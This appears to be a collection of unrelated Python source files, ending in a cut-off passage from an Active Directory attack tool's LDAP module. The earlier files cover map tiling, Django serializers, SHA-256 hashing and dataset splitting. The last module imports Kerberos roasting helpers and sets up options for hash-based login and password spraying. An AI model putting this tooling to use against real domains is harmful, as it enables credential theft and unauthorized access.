"""From paletted file you can create RGBA file (temp.vrt) by:
gdal_translate -of vrt -expand rgba %s temp.vrt
then run:
gdal2tiles temp.vrt""" % self.source_path)
# Get NODATA value
# If the source dataset has NODATA, use it.
if self.source_nodata is None:
for i in range(1, self.in_ds.RasterCount + 1):
ndvalue = self.in_ds.GetRasterBand(i).GetNoDataValue()
if ndvalue is not None:
self.source_nodata = ndvalue
break
# Here we should have RGBA input dataset opened in self.in_ds
# Spatial Reference System of the input raster
self.in_srs = None
if self.source_srs:
self.in_srs = osr.SpatialReference()
self.in_srs.SetFromUserInput(self.source_srs)
self.in_srs_wkt = self.in_srs.ExportToWkt()
else:
self.in_srs_wkt = self.in_ds.GetProjection()
if not self.in_srs_wkt and self.in_ds.GetGCPCount() != 0:
self.in_srs_wkt = self.in_ds.GetGCPProjection()
if self.in_srs_wkt:
self.in_srs = osr.SpatialReference()
self.in_srs.ImportFromWkt(self.in_srs_wkt)
# Spatial Reference System of tiles
self.out_srs = osr.SpatialReference()
def set_out_srs(self):
pass
def instantiate_image_output(self):
# Instantiate image output.
resampler = get_resampler(self.resampling_method, self.write_method)
self.image_output = SimpleImageOutput(
self.out_ds,
self.tile_size,
resampler,
self.write_method,
self.source_nodata,
self.output_dir,
)
def configure_bounds(self):
# Read the georeference
self.out_gt = self.out_ds.GetGeoTransform()
# Report error in case rotation/skew is in geotransform
# (possible only in 'raster' profile)
# TODO: move to raster.Raster, somehow...
if (self.out_gt[2], self.out_gt[4]) != (0, 0):
raise Exception(
"Georeference of the raster contains rotation or skew. "
"Such raster is not supported. Please use gdalwarp first."
)
# TODO: Do the warping in this case automaticaly
#
# Here we expect: pixel is square, no rotation on the raster
#
# Output Bounds - coordinates in the output SRS
self.ominx = self.out_gt[0]
self.omaxx = self.out_gt[0] + self.out_ds.RasterXSize * self.out_gt[1]
self.omaxy = self.out_gt[3]
self.ominy = self.out_gt[3] - self.out_ds.RasterYSize * self.out_gt[1]
# Note: maybe round(x, 14) to avoid the gdal_translate behaviour,
# when 0 becomes -1e-15
# -------------------------------------------------------------------------
def generate_base_tiles(self):
"""Generation of the base tiles (the lowest in the pyramid)
directly from the input raster"""
# Set the bounds
tminx, tminy, tmaxx, tmaxy = self.tminmax[self.max_zoom]
querysize = self.querysize
# Just the center tile
# tminx = tminx+ (tmaxx - tminx)/2
# tminy = tminy+ (tmaxy - tminy)/2
# tmaxx = tminx
# tmaxy = tminy
tz = self.max_zoom
tzs = str(tz)
for tx in range(tminx, tmaxx + 1):
target_path = self.output_dir / tzs / str(tx)
dir_already_existed = ensure_dir_exists(target_path)
for ty in self.get_y_range(self.max_zoom):
xyzzy = self.generate_base_tile_xyzzy(
tx, ty, tz,
querysize,
tminx, tminy, tmaxx, tmaxy
)
self.image_output.write_base_tile(
tx, ty, tz, xyzzy, dir_already_existed
)
# -------------------------------------------------------------------------
def generate_overview_tiles(self):
"""Generation of the overview tiles (higher in the pyramid)
based on existing tiles"""
# Usage of existing tiles:
# from 4 underlying tiles generate one as overview.
# querysize = tile_size * 2
for tz in range(self.max_zoom - 1, self.min_zoom - 1, -1):
tminx, tminy, tmaxx, tmaxy = self.tminmax[tz]
tzs = str(tz)
for tx in range(tminx, tmaxx + 1):
target_path = self.output_dir / tzs / str(tx)
dir_already_existed = ensure_dir_exists(target_path)
for ty in self.get_y_range(tz):
self.image_output.write_overview_tile(
tx, ty, tz, dir_already_existed
)
def get_y_range(self, zoom):
tminx, tminy, tmaxx, tmaxy = self.tminmax[zoom]
return range(tmaxy, tminy - 1, -1)
|
from rest_framework import serializers
from .models import Institute, Student, Batch, Paper, Section, Question, Exam, Result, AttemptedQuestion, BaseUser
from django.contrib.auth.models import Group
class BaseUserSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = BaseUser
fields = ['url', 'username', 'email', 'groups', 'is_institute']
class StudentSerializer(serializers.ModelSerializer):
class Meta:
model = Student
fields = '__all__'
class BatchSerializer(serializers.ModelSerializer):
class Meta:
model = Batch
fields = '__all__'
class PaperSerializer(serializers.ModelSerializer):
class Meta:
model = Paper
fields = '__all__'
class SectionSerializer(serializers.ModelSerializer):
class Meta:
model = Section
fields = '__all__'
class QuestionSerializer(serializers.ModelSerializer):
class Meta:
model = Question
fields = '__all__'
class ExamSerializer(serializers.ModelSerializer):
class Meta:
model = Exam
fields = '__all__'
class ResultSerializer(serializers.ModelSerializer):
class Meta:
model = Result
fields = '__all__'
class AttemptedQuestionSerializer(serializers.ModelSerializer):
class Meta:
model = AttemptedQuestion
fields = '__all__'
class GroupSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Group
fields = ['url', 'name']
class InstituteSerializer(serializers.ModelSerializer):
# student_institute = StudentSerializer(many=True, read_only=True)
# batch_institute = BatchSerializer(many=True, read_only=True)
class Meta:
model = Institute
fields = '__all__'
|
#!/usr/bin/env python3
import argparse
from .generator import Generator
def standalone():
"""Standalone command for generating header and body input files
"""
parser = argparse.ArgumentParser(
description="Generate header and body files for WF Dispatcher"
)
parser.add_argument(
"-b", "--bodyfile", help="File for post data", default="postbody.json"
)
parser.add_argument(
"-r", "--headerfile", help="Auth header file", default="authheader.txt"
)
parser.add_argument(
"-m",
"--mock",
help="Make mock user, not from env",
action="store_true",
)
args = parser.parse_args()
generator = Generator(
bodyfile=args.bodyfile, headerfile=args.headerfile, _mock=args.mock
)
generator.go()
if __name__ == "__main__":
standalone()
|
import helper
class SHA256:
msg = None
chunks = None
message_length = None
def __init__(self, message):
self.hasher = helper.Helper(message)
self.msg = message
self.message_length = len(message)
def preprocess(self):
self.hasher.pre_process()
self.msg = self.hasher.binary_msg_with_padding_and_length
self.chunks = self.hasher.chunks
def copy_chunks(self):
self.hasher.copy_chunk_bits()
self.hasher.extend_words()
def compression_function(self):
self.hasher.compress()
def digest(self):
return self.hasher.digest()
if __name__ == '__main__':
message = 'the quick brown fox jumped over the lazy dog'
s = SHA256(message)
s.preprocess()
# ensure your version of python supports the statement below
print('input message is: {} \ndigest (SHA-256) is: {}'.format(message, s.digest()))
|
# Copyright (C) 2017 Zhixian MA <zxma_sjtu@qq.com>
"""
Get samples to train CNN
Totally 21 samples, in which 17 are for training and 5 for test.
"""
import os
import argparse
import numpy as np
import scipy.io as sio
def main():
"""The main function"""
# Init
parser = argparse.ArgumentParser(description="Get samples to train CNN")
# Parameters
parser.add_argument("inpath", help="path of the folder saving samples")
parser.add_argument("ratio", help="ratio of training samples.")
args = parser.parse_args()
inpath = args.inpath
# ratio = float(args.ratio)
# Init
data_bkg = None
data_ext = None
data_cav = None
label_bkg = None
label_ext = None
label_cav = None
if not os.path.exists(inpath):
print("The inpath does not exist.")
return
samples = os.listdir(inpath)
for s in samples:
obspath = os.path.join(inpath, s)
# Judge existance of the path
if not os.path.exists(obspath):
print("The observation %s does not exist." % obspath)
else:
print("Processing on sample %s ..." % s)
matpath = os.path.join(obspath, 'sample_sm.mat')
# load samples
dataset = sio.loadmat(matpath)
# separate samples
data = dataset['data']
label = dataset['label']
idx_bkg = np.where(label==0)[0]
idx_cav = np.where(label==1)[0]
idx_ext = np.where(label==2)[0]
# combine
if data_bkg is None:
data_bkg = data[idx_bkg,:]
label_bkg = label[idx_bkg,:]
data_ext = data[idx_ext,:]
label_ext = label[idx_ext,:]
data_cav = data[idx_cav,:]
label_cav = label[idx_cav,:]
else:
data_bkg = np.row_stack((data_bkg,data[idx_bkg,:]))
label_bkg = np.row_stack((label_bkg,label[idx_bkg,:]))
data_ext = np.row_stack((data_ext,data[idx_ext,:]))
label_ext = np.row_stack((label_ext,label[idx_ext,:]))
data_cav = np.row_stack((data_cav,data[idx_cav,:]))
label_cav = np.row_stack((label_cav,label[idx_cav,:]))
# get train and test sample
# save
sample_path = os.path.join(inpath, 'sample_all')
print("Saving samples ...")
sio.savemat(sample_path,{"data_bkg": data_bkg,
"data_ext": data_ext,
"data_cav": data_cav,
"label_bkg":label_bkg,
"label_ext":label_ext,
"label_cav":label_cav})
if __name__ == "__main__":
main()
|
"""
Add something like this to your settings
ANALYSIS_TIME_FRAME_TASKS = {
"thermometer": {
"name": "Thermometer",
"frame_class_path": "twitter_feels.apps.thermometer.models.TimeFrame",
},
"other": {
"name": "Something Else",
"frame_class_path": "some.other.OtherTimeFrame",
"autostart": True,
},
}
"""
from django.conf import settings
TIME_FRAME_TASKS = getattr(settings, 'ANALYSIS_TIME_FRAME_TASKS', {})
|
import numpy as np
from typing import Any
from typing import Dict
from typing import List
from typing import Type
from typing import Tuple
from typing import Union
from typing import Callable
from typing import Optional
from cftool.misc import register_core
from cftool.misc import shallow_copy_dict
from cftool.misc import get_unique_indices
from cftool.misc import Sampler
from cftool.misc import LoggingMixin
from abc import *
from .misc import *
from ..types import *
from .api import TabularData
class KFold:
"""
Util class which can perform k-fold data splitting:
1. X = {x1, x2, ..., xn} -> [X1, X2, ..., Xk]
2. Xi ∩ Xj = ∅, ∀ i, j = 1,..., K
3. X1 ∪ X2 ∪ ... ∪ Xk = X
* Notice that `KFold` does not always hold the principles listed above, because `DataSplitter`
will ensure that at least one sample of each class will be kept. In this case, when we apply
`KFold` to an imbalance dataset, `KFold` may slightly violate principle 2. and 3.
Parameters
----------
k : int, number of folds
dataset : TabularDataset, dataset which we want to split
**kwargs : used to initialize `DataSplitter` instance
Examples
----------
>>> import numpy as np
>>>
>>> from cfdata.types import np_int_type
>>> from cfdata.tabular.api import TabularDataset
>>> from cfdata.tabular.toolkit import KFold
>>>
>>> x = np.arange(12).reshape([6, 2])
>>> # create an imbalance dataset
>>> y = np.zeros(6, np_int_type)
>>> y[[-1, -2]] = 1
>>> dataset = TabularDataset.from_xy(x, y, "clf")
>>> k_fold = KFold(3, dataset)
>>> for train_fold, test_fold in k_fold:
>>> print(np.vstack([train_fold.dataset.x, test_fold.dataset.x]))
>>> print(np.vstack([train_fold.dataset.y, test_fold.dataset.y]))
"""
def __init__(self, k: int, dataset: TabularDataset, **kwargs: Any):
if k <= 1:
raise ValueError("k should be larger than 1 in KFold")
ratio = 1.0 / k
self.n_list = (k - 1) * [ratio]
self.splitter = DataSplitter(**kwargs).fit(dataset)
self._cursor: int
self._order: np.ndarray
self.split_results: List[SplitResult]
def __iter__(self) -> "KFold":
self.split_results = self.splitter.split_multiple(
self.n_list,
return_remained=True,
)
self._order = np.random.permutation(len(self.split_results)).tolist()
self._cursor = 0
return self
def __next__(self) -> Tuple[SplitResult, SplitResult]:
if self._cursor >= len(self._order):
raise StopIteration
train_results = self.split_results.copy()
test_result = train_results.pop(self._order[self._cursor])
train_result = SplitResult.concat(train_results)
self._cursor += 1
return train_result, test_result
class KRandom:
"""
Util class which can perform k-random data splitting:
1. X = {x1, x2, ..., xn} -> [X1, X2, ..., Xk]
2. idx{X1} ≠ idx{X2} ≠ ... ≠ idx{Xk}, where idx{X} = {1, 2, ..., n}
3. X1 = X2 = ... = Xk = X
Parameters
----------
k : int, number of folds
num_test : {int, float}
* if float and < 1 : ratio of the test dataset
* if int and > 1 : exact number of test samples
dataset : TabularDataset, dataset which we want to split
**kwargs : used to initialize `DataSplitter` instance
Examples
----------
>>> import numpy as np
>>>
>>> from cfdata.types import np_int_type
>>> from cfdata.tabular.api import TabularDataset
>>> from cfdata.tabular.toolkit import KRandom
>>>
>>> x = np.arange(12).reshape([6, 2])
>>> # create an imbalance dataset
>>> y = np.zeros(6, np_int_type)
>>> y[[-1, -2]] = 1
>>> dataset = TabularDataset.from_xy(x, y, "clf")
>>> k_random = KRandom(3, 2, dataset)
>>> for train_fold, test_fold in k_random:
>>> print(np.vstack([train_fold.dataset.x, test_fold.dataset.x]))
>>> print(np.vstack([train_fold.dataset.y, test_fold.dataset.y]))
"""
def __init__(
self,
k: int,
num_test: Union[int, float],
dataset: TabularDataset,
**kwargs: Any,
):
self._cursor: int
self.k, self.num_test = k, num_test
self.splitter = DataSplitter(**kwargs).fit(dataset)
def __iter__(self) -> "KRandom":
self._cursor = 0
return self
def __next__(self) -> Tuple[SplitResult, SplitResult]:
if self._cursor >= self.k:
raise StopIteration
self._cursor += 1
self.splitter.reset()
test_result, train_result = self.splitter.split_multiple(
[self.num_test],
return_remained=True,
)
return train_result, test_result
class KBootstrap:
"""
Util class which can perform k-random data splitting with bootstrap:
1. X = {x1, x2, ..., xn} -> [X1, X2, ..., Xk] (Use bootstrap aggregation to collect datasets)
3. idx{X1} ≠ idx{X2} ≠ ... ≠ idx{Xk}, where idx{X} = {1, 2, ..., n}
4. X1 = X2 = ... = Xk = X
* Notice that only some of the special algorithms (e.g. bagging) need `KBootstrap`.
Parameters
----------
k : int, number of folds
num_test : {int, float}
* if float and < 1 : ratio of the test dataset
* if int and > 1 : exact number of test samples
dataset : TabularDataset, dataset which we want to split
**kwargs : used to initialize `DataSplitter` instance
Examples
----------
>>> import numpy as np
>>>
>>> from cfdata.types import np_int_type
>>> from cfdata.tabular.api import TabularDataset
>>> from cfdata.tabular.toolkit import KBootstrap
>>>
>>> x = np.arange(12).reshape([6, 2])
>>> # create an imbalance dataset
>>> y = np.zeros(6, np_int_type)
>>> y[[-1, -2]] = 1
>>> dataset = TabularDataset.from_xy(x, y, "clf")
>>> k_bootstrap = KBootstrap(3, 2, dataset)
>>> for train_fold, test_fold in k_bootstrap:
>>> print(np.vstack([train_fold.dataset.x, test_fold.dataset.x]))
>>> print(np.vstack([train_fold.dataset.y, test_fold.dataset.y]))
"""
def __init__(
self,
k: int,
num_test: Union[int, float],
dataset: TabularDataset,
**kwargs: Any,
):
self._cursor: int
self.dataset = dataset
self.num_samples = len(dataset)
if isinstance(num_test, float):
num_test = int(round(num_test * self.num_samples))
self.k, self.num_test = k, num_test
self.splitter = DataSplitter(**kwargs).fit(dataset)
def __iter__(self) -> "KBootstrap":
self._cursor = 0
return self
def __next__(self) -> Tuple[SplitResult, SplitResult]:
if self._cursor >= self.k:
raise StopIteration
self._cursor += 1
self.splitter.reset()
test_result, train_result = self.splitter.split_multiple(
[self.num_test],
return_remained=True,
)
tr_indices = train_result.corresponding_indices
tr_indices = np.random.choice(tr_indices, len(tr_indices))
tr_set = self.dataset.split_with(tr_indices)
tr_split = SplitResult(tr_set, tr_indices, None)
return tr_split, test_result
class ImbalancedSampler(LoggingMixin):
"""
Util class which can sample imbalance dataset in a balanced way
Parameters
----------
data : TabularData, data which we want to sample from
imbalance_threshold : float
* for binary class cases, if n_pos / n_neg < threshold, we'll treat data as imbalance data
* for multi class cases, if n_min_class / n_max_class < threshold, we'll treat data as imbalance data
shuffle : bool, whether shuffle the returned indices
sample_method : str, sampling method used in `cftool.misc.Sampler`
* currently only 'multinomial' is supported
verbose_level : int, verbose level used in `LoggingMixin`
Examples
----------
>>> import numpy as np
>>>
>>> from cfdata.types import np_int_type
>>> from cfdata.tabular import TabularData
>>> from cfdata.tabular.toolkit import ImbalancedSampler
>>> from cftool.misc import get_counter_from_arr
>>>
>>> n = 20
>>> x = np.arange(2 * n).reshape([n, 2])
>>> # create an imbalance dataset
>>> y = np.zeros([n, 1], np_int_type)
>>> y[-1] = [1]
>>> data = TabularData().read(x, y)
>>> sampler = ImbalancedSampler(data)
>>> # Counter({1: 12, 0: 8})
>>> # This may vary, but will be rather balanced
>>> # You might notice that positive samples are even more than negative samples!
>>> print(get_counter_from_arr(y[sampler.get_indices()]))
"""
def __init__(
self,
data: TabularData,
imbalance_threshold: float = 0.1,
*,
shuffle: bool = True,
aggregation: str = "continuous",
aggregation_config: Optional[Dict[str, Any]] = None,
sample_weights: Optional[np.ndarray] = None,
sample_method: str = "multinomial",
verbose_imbalance: bool = True,
verbose_level: int = 2,
):
self.data = data
self.shuffle = shuffle
self.imbalance_threshold = imbalance_threshold
self._sample_imbalance_flag = True
self._aggregation_name = aggregation
self._aggregation_config = aggregation_config
if not data.is_ts:
self.aggregation = None
self._num_samples = len(data)
else:
if aggregation_config is None:
aggregation_config = {}
base = aggregation_dict[aggregation]
self.aggregation = base(data, aggregation_config, data._verbose_level)
self._num_samples = len(self.aggregation.indices2id)
if sample_weights is not None:
label_counts = None
self.sample_weights = sample_weights.copy()
self.sample_weights /= self.sample_weights.sum() + 1e-8
self._sampler = Sampler(sample_method, self.sample_weights)
else:
self.sample_weights = None
if not self.shuffle or data.is_reg:
label_counts = self._label_ratios = self._sampler = None
else:
label_recognizer = data.recognizers[-1]
if label_recognizer is None:
raise ValueError(
"`data` should contain label recognizer "
"for `ImbalancedSampler`"
)
label_counter = label_recognizer.counter
transform_dict = label_recognizer.transform_dict
new_counter = {transform_dict[k]: v for k, v in label_counter.items()}
counts_list = [new_counter[k] for k in sorted(new_counter)]
label_counts = np.array(counts_list, np_float_type)
self._label_ratios = label_counts / self._num_samples
max_label_count = label_counts.max()
if label_counts.min() / max_label_count >= imbalance_threshold:
self._sampler = None
else:
processed = data.processed
if processed is None:
raise ValueError(
"`data` should contain `processed` "
"for `ImbalancedSampler`"
)
if not isinstance(processed.y, np.ndarray):
raise ValueError(
"`data` should contain `processed.y` "
"for `ImbalancedSampler`"
)
labels = processed.y.ravel()
sample_weights = np.zeros(self._num_samples, np_float_type)
for i, count in enumerate(label_counts):
sample_weights[labels == i] = max_label_count / count
sample_weights /= sample_weights.sum() + 1e-8
self._sampler = Sampler(sample_method, sample_weights)
self._sample_method = sample_method
self._verbose_level = verbose_level
if label_counts is not None and verbose_imbalance:
if self._sampler is not None:
self.log_msg(
"using imbalanced sampler with "
f"label counts = {label_counts.tolist()}",
self.info_prefix,
2,
)
def __len__(self) -> int:
return self._num_samples
@property
def is_imbalance(self) -> bool:
return self._sampler is not None
@property
def sample_imbalance(self) -> bool:
return self._sample_imbalance_flag
@property
def label_ratios(self) -> Optional[np.ndarray]:
return self._label_ratios
def switch_imbalance_status(self, flag: bool) -> None:
self._sample_imbalance_flag = flag
def get_indices(self) -> np.ndarray:
if not self.shuffle or not self._sample_imbalance_flag or not self.is_imbalance:
indices = np.arange(self._num_samples).astype(np_int_type)
else:
if self._sampler is None:
raise ValueError("`_sampler` is not yet generated")
indices = self._sampler.sample(self._num_samples)
if self.shuffle:
np.random.shuffle(indices)
if self.aggregation is not None:
indices = self.aggregation.aggregate(indices)
return indices
def copy(self) -> "ImbalancedSampler":
aggregation_config = None
if self._aggregation_config is not None:
aggregation_config = shallow_copy_dict(self._aggregation_config)
sample_weights = None
if self.sample_weights is not None:
sample_weights = self.sample_weights.copy()
return ImbalancedSampler(
self.data,
self.imbalance_threshold,
shuffle=self.shuffle,
aggregation=self._aggregation_name,
aggregation_config=aggregation_config,
sample_weights=sample_weights,
sample_method=self._sample_method,
verbose_level=self._verbose_level,
verbose_imbalance=False,
)
class DataLoader:
"""
Util class which can generated batches from `ImbalancedSampler`
Examples
----------
>>> import numpy as np
>>>
>>> from cfdata.types import np_int_type
>>> from cfdata.tabular import TabularData
>>> from cfdata.tabular.toolkit import DataLoader, ImbalancedSampler
>>> from cftool.misc import get_counter_from_arr
>>>
>>> n = 20
>>> x = np.arange(2 * n).reshape([n, 2])
>>> y = np.zeros([n, 1], np_int_type)
>>> y[-1] = [1]
>>> data = TabularData().read(x, y)
>>> sampler = ImbalancedSampler(data)
>>> loader = DataLoader(16, sampler)
>>> y_batches = []
>>> for x_batch, y_batch in loader:
>>> y_batches.append(y_batch)
>>> # (16, 1) (16, 1)
>>> # (4, 1) (4, 1)
>>> print(x_batch.shape, y_batch.shape)
>>> # Counter({1: 11, 0: 9})
>>> print(get_counter_from_arr(np.vstack(y_batches).ravel()))
"""
def __init__(
self,
batch_size: int,
sampler: ImbalancedSampler,
*,
return_indices: bool = False,
label_collator: Optional[Callable[[np.ndarray], np.ndarray]] = None,
verbose_level: int = 2,
):
self._cursor: int
self._indices_in_use = None
self._verbose_level = verbose_level
self.data = sampler.data
self.sampler = sampler
self.return_indices = return_indices
self._label_collator = label_collator
self._num_samples = len(sampler)
self.batch_size = min(self._num_samples, batch_size)
def __len__(self) -> int:
n_iter = int(self._num_samples / self.batch_size)
return n_iter + int(n_iter * self.batch_size < self._num_samples)
def __iter__(self) -> "DataLoader":
self._reset()
return self
def __next__(self) -> batch_type:
data_next = self._get_next_batch()
if self.return_indices:
(x_batch, y_batch), indices = data_next
else:
indices = None
x_batch, y_batch = data_next
if self._label_collator is not None:
y_batch = self._label_collator(y_batch)
batch = x_batch, y_batch
if not self.return_indices:
return batch
return batch, indices
@property
def enabled_sampling(self) -> bool:
return self.sampler.sample_imbalance
@enabled_sampling.setter
def enabled_sampling(self, value: bool) -> None:
self.sampler.switch_imbalance_status(value)
def _reset(self) -> None:
self._cursor = -1
self._indices_in_use = self.sampler.get_indices()
def _get_next_batch(self) -> batch_type:
n_iter, self._cursor = len(self), self._cursor + 1
if self._cursor == n_iter:
raise StopIteration
if self._indices_in_use is None:
raise ValueError("`_indices_in_use` is not yet generated")
start = self._cursor * self.batch_size
end = start + self.batch_size
indices = self._indices_in_use[start:end]
batch = self.data[indices]
if not self.return_indices:
return batch
return batch, indices
def _check_full_batch(self, data_item: data_item_type) -> bool:
if len(data_item[0]) == self.batch_size:
return True
return False
def copy(self) -> "DataLoader":
return DataLoader(
self.batch_size,
self.sampler.copy(),
return_indices=self.return_indices,
label_collator=self._label_collator,
verbose_level=self._verbose_level,
)
# time series
aggregation_dict: Dict[str, Type["AggregationBase"]] = {}
class AggregationBase(LoggingMixin, metaclass=ABCMeta):
def __init__(self, data: TabularData, config: Dict[str, Any], verbose_level: int):
if not data.is_ts:
raise ValueError("time series data is required")
self.data = data
self.config = config
self._verbose_level = verbose_level
self._num_history = config.setdefault("num_history", 1)
raw = data.raw
if raw is None:
raise ValueError("`data` need to contain `raw` for `AggregationBase`")
if raw.xT is None:
raise ValueError("`data` need to contain `raw.xT` for `AggregationBase`")
if data.ts_config is None:
raise ValueError("`data` need to contain `ts_config` for `AggregationBase`")
id_column_idx = data.ts_config.id_column_idx
if id_column_idx is None:
msg = "`ts_config` need to contain `id_column_idx` for `AggregationBase`"
raise ValueError(msg)
id_column = raw.xT[id_column_idx]
sorted_id_column = [id_column[i] for i in data.ts_sorting_indices]
unique_indices = get_unique_indices(np.array(sorted_id_column))
self.indices2id: np.ndarray
self._unique_id_arr = unique_indices.unique
self._id2indices = unique_indices.split_indices
self._initialize()
@property
@abstractmethod
def num_aggregation(self) -> int:
pass
@abstractmethod
def _aggregate_core(self, indices: np.ndarray) -> np.ndarray:
"""indices should be a column vector"""
def _initialize(self) -> None:
num_list = list(map(len, self._id2indices))
self._num_samples_per_id = np.array(num_list, np_int_type)
self.log_msg("generating valid aggregation info", self.info_prefix, 5)
valid_mask = self._num_samples_per_id >= self._num_history
if not valid_mask.any():
raise ValueError(
"current settings lead to empty valid dataset, "
"increasing raw dataset size or decreasing n_history "
f"(current: {self._num_history}) might help"
)
if not valid_mask.all():
invalid_mask = ~valid_mask
n_invalid_id = invalid_mask.sum()
n_invalid_samples = self._num_samples_per_id[invalid_mask].sum()
self.log_msg(
f"{n_invalid_id} id (with {n_invalid_samples} samples) "
f"will be dropped (n_history={self._num_history})",
self.info_prefix,
verbose_level=2,
)
invalid_ids = self._unique_id_arr[invalid_mask].tolist()
self.log_msg(
f"dropped id : {', '.join(map(str, invalid_ids))}",
self.info_prefix,
verbose_level=4,
)
self._num_samples_per_id_cumsum = np.hstack(
[[0], np.cumsum(self._num_samples_per_id[:-1])]
)
# self._id2indices need to contain 'redundant' indices here because
# aggregation need to aggregate those 'invalid' samples
self._id2indices_stack = np.hstack(self._id2indices)
self.log_msg(
"generating aggregation attributes",
self.info_prefix,
verbose_level=5,
)
self._get_id2valid_indices()
self._inject_valid_samples_info()
def _inject_valid_samples_info(self) -> None:
# 'indices' in self.indices2id here doesn't refer to indices of original dataset
# (e.g. 'indices' in self._id2indices), but refers to indices generated by sampler,
# so we should only care 'valid' indices here
self._num_valid_samples_per_id = list(map(len, self._id2valid_indices))
self._num_valid_samples_per_id_cumsum = np.hstack(
[[0], np.cumsum(self._num_valid_samples_per_id[:-1])]
)
num_int = self._num_valid_samples_per_id_cumsum.astype(np_int_type)
self._num_valid_samples_per_id_cumsum = num_int
arange = np.arange(len(self._unique_id_arr))
self.indices2id = np.repeat(arange, self._num_valid_samples_per_id)
self._id2valid_indices_stack = np.hstack(self._id2valid_indices)
def _get_id2valid_indices(self) -> None:
# TODO : support nan_fill here
nan_fill = self.config.setdefault("nan_fill", "past")
nan_ratio = self.config.setdefault("nan_ratio", 0.0)
self._id2valid_indices = [
np.array([], np_int_type)
if len(indices) < self._num_history
else np.arange(
cumsum, cumsum + len(indices) - self._num_history + 1
).astype(np_int_type)
for cumsum, indices in zip(
self._num_samples_per_id_cumsum, self._id2indices
)
]
self._inject_valid_samples_info()
processed = self.data.processed
if processed is None:
raise ValueError("`processed` is not generated yet")
x, y = processed.xy
assert isinstance(x, np.ndarray)
feature_dim = self.data.processed_dim
for i, valid_indices in enumerate(self._id2valid_indices):
cumsum = self._num_valid_samples_per_id_cumsum[i]
arange = np.arange(cumsum, cumsum + len(valid_indices))
aggregated_flat_indices = self.aggregate(arange).ravel()
aggregated_x = x[aggregated_flat_indices]
shape = [-1, self.num_aggregation, feature_dim]
aggregated_x = aggregated_x.reshape(shape)
aggregated_x_nan_mask = np.isnan(aggregated_x)
if y is None:
aggregated_y_valid_mask = None
else:
aggregated_y = y[self.get_last_indices(aggregated_flat_indices)]
aggregated_y_valid_mask = ~np.isnan(aggregated_y)
aggregated_nan_ratio = aggregated_x_nan_mask.mean((1, 2))
valid_mask = aggregated_nan_ratio <= nan_ratio
if aggregated_y_valid_mask is not None:
valid_mask &= aggregated_y_valid_mask.ravel()
new_valid_indices = valid_indices[valid_mask]
self._id2valid_indices[i] = new_valid_indices
def aggregate(self, indices: np.ndarray) -> np.ndarray:
"""
We've maintained two groups of indices in `_initialize` method:
* the 'original' indices, which points to indices of original dataset
* the 'valid' indices, which is 'virtual' should points to indices
of the 'original' indices
So we need to translate sampler indices to 'valid' indices, add offsets
to the 'valid' indices, and then fetch the 'original' indices to fetch
the corresponding data
* _aggregate_core method will add offsets for us
Parameters
----------
indices : np.ndarray, indices come from sampler
Returns
-------
indices : np.ndarray, aggregated 'original' indices
"""
valid_indices = self._id2valid_indices_stack[indices]
aggregated_valid_indices_mat = self._aggregate_core(valid_indices[..., None])
aggregated = self._id2indices_stack[aggregated_valid_indices_mat.ravel()]
reversed_aggregated = self.data.ts_sorting_indices[aggregated]
return reversed_aggregated.reshape([-1, self.num_aggregation])
def get_last_indices(self, aggregated_flat_indices: np.ndarray) -> np.ndarray:
reshaped = aggregated_flat_indices.reshape([-1, self.num_aggregation])
return reshaped[..., -1]
@classmethod
def register(cls, name: str) -> Callable[[Type], Type]:
global aggregation_dict
return register_core(name, aggregation_dict)
@AggregationBase.register("continuous")
class ContinuousAggregation(AggregationBase):
def _initialize(self) -> None:
self._history_arange = np.arange(self._num_history)
super()._initialize()
@property
def num_aggregation(self) -> int:
return self._num_history
def _aggregate_core(self, indices: np.ndarray) -> np.ndarray:
return indices + self._history_arange
__all__ = [
"KFold",
"KRandom",
"KBootstrap",
"ImbalancedSampler",
"DataLoader",
"aggregation_dict",
"AggregationBase",
]
|
class PSPException(Exception):
pass
|
# from https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py
# https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
import requests
import logging
import configparser
from binascii import b2a_hex, unhexlify, hexlify
from cme.connection import *
from cme.helpers.logger import highlight
from cme.logger import CMEAdapter
from cme.helpers.bloodhound import add_user_bh
from cme.protocols.ldap.kerberos import KerberosAttacks
from impacket.smbconnection import SMBConnection, SessionError
from impacket.smb import SMB_DIALECT
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_DONT_REQUIRE_PREAUTH, UF_TRUSTED_FOR_DELEGATION, UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION
from impacket.krb5.kerberosv5 import sendReceive, KerberosError, getKerberosTGT, getKerberosTGS
from impacket.krb5.types import KerberosTime, Principal
from impacket.ldap import ldap as ldap_impacket
from impacket.krb5 import constants
from impacket.ldap import ldapasn1 as ldapasn1_impacket
from io import StringIO
ldap_error_status = {
"533":"STATUS_ACCOUNT_DISABLED",
"701":"STATUS_ACCOUNT_EXPIRED",
"531":"STATUS_ACCOUNT_RESTRICTION",
"530":"STATUS_INVALID_LOGON_HOURS",
"532":"STATUS_PASSWORD_EXPIRED",
"773":"STATUS_PASSWORD_MUST_CHANGE",
"775":"USER_ACCOUNT_LOCKED",
"50":"LDAP_INSUFFICIENT_ACCESS"
}
class ldap(connection):
def __init__(self, args, db, host):
self.domain = None
self.server_os = None
self.os_arch = 0
self.hash = None
self.ldapConnection = None
self.lmhash = ''
self.nthash = ''
self.baseDN = ''
self.remote_ops = None
self.bootkey = None
self.output_filename = None
self.smbv1 = None
self.signing = False
self.smb_share_name = smb_share_name
self.admin_privs = False
connection.__init__(self, args, db, host)
@staticmethod
def proto_args(parser, std_parser, module_parser):
ldap_parser = parser.add_parser('ldap', help="own stuff using LDAP", parents=[std_parser, module_parser])
ldap_parser.add_argument("-H", '--hash', metavar="HASH", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')
ldap_parser.add_argument("--no-bruteforce", action='store_true', help='No spray when using file for username and password (user1 => password1, user2 => password2')
ldap_parser.add_argument("--continue-on-success", action='store_true', help="continues authentication attempts even after successes")
ldap_parser.add_argument("--port", type=int, choices={389, 636}, default=389, help="LDAP port (default: 389)")
dgroup = ldap_parser.add_mutually_exclusive_group()
dgroup.add_argument("-d", metavar="DOMAIN", dest='domain', type=str, default=None, help="domain to authenticate to")
dgroup.add_argument("--local-auth", action='store_true', help='authenticate locally to each target')
